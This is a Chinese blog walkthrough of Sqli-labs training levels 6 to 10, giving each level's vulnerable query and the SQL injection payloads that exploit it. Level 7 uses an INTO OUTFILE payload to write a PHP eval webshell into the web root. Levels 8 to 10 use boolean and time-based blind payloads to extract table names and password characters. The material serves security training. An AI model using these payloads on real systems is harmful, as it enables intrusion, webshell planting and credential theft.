zoukankan      html  css  js  c++  java
  • 重闯Sqli-labs关卡第三天(6-10关)

    第六关(双注入GET双引号字符型注)

    核心代码:

    1 $id = '"'.$id.'"';
    2 $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

    根第五关类似

    第七关(导出文件GET字符型注入)

    核心代码

    $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

    不返回mysql错误

    检测secure_file_prive是否为null 是null则不能写入
    SHOW VARIABLES LIKE “secure_file_priv”;
    secure_file_priv =空才行

    payload:

    id=1')) and 1=1--+
    id=1')) and 1=2--+
    #写入一句话webshell
    id=1'))UNION SELECT 1,"<?php @eval($_POST['X']);?>",3 into outfile "C:\phpStudy\PHPTutorial\WWW\lou\sql\Less-7\muma.php"--+

    参考学习:https://blog.csdn.net/Jiajiajiang_/article/details/86226884

    第八关(布尔型单引号GET盲注)

    payload:

     1 判断数据库长度
     2 ' and length(database())=8--+
     3 爆数据库名
     4 ' and left((select database()),1)='s'--+
     5 判断数据库中表的数量
     6 ' and if((select count(*) from information_schema.tables where table_schema=database())>1,sleep(5),1)--+
     7 ' and (select count(*) from information_schema.tables where table_schema=database())>1 --+
     8 爆表名
     9 ' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+
    10 判断字段数量
    11 ' and (select count(*) from information_schema.columns where table_name='users')>1--+
    12 爆字段名
    13 ' and left((select column_name from information_schema.columns where table_name='users' limit 1,1),1)='f'--+
    14 爆数据
    15 ' and left((select password from users limit 0,1),1)='D' --+

    第九关(基于时间的GET单引号盲注)

    payload:

    1 ' and if(length(database())=8,sleep(3),1)--+
    2 ' and if(left(database(),1)='s',sleep(3),1)--+
    3 ' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(3),1)--+
    4 ' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password',sleep(3),1)--+
    5 ' and if(left((select password from users limit 0,1),1)='D',sleep(3),1) --+

    第十关(基于时间的双引号盲注)

    payload:

    1 " and if(length(database())=8,sleep(3),1)--+
    2 " and if(left(database(),1)='s',sleep(3),1)--+
    3 " and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(3),1)--+
    4 " and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password',sleep(3),1)--+
    5 " and if(left((select password from users limit 0,1),1)='D',sleep(3),1)--+

    11111

    1

    11111

    1

  • 相关阅读:
    crontab定时任务
    find at tar命令详解
    c#调用c++dll库调用约定问题
    ATL和ActiveX做的控件.dll和.ocx最主要的区别(摘录)
    实现内外网的策略
    探查“ORA-01000:超出最多允许打开的游标数”
    良好编程习惯的重要性
    PCS不能用问题
    msf外网--->>安卓
    github 克隆代码问题
  • 原文地址:https://www.cnblogs.com/xhds/p/12181225.html
Copyright © 2011-2022 走看看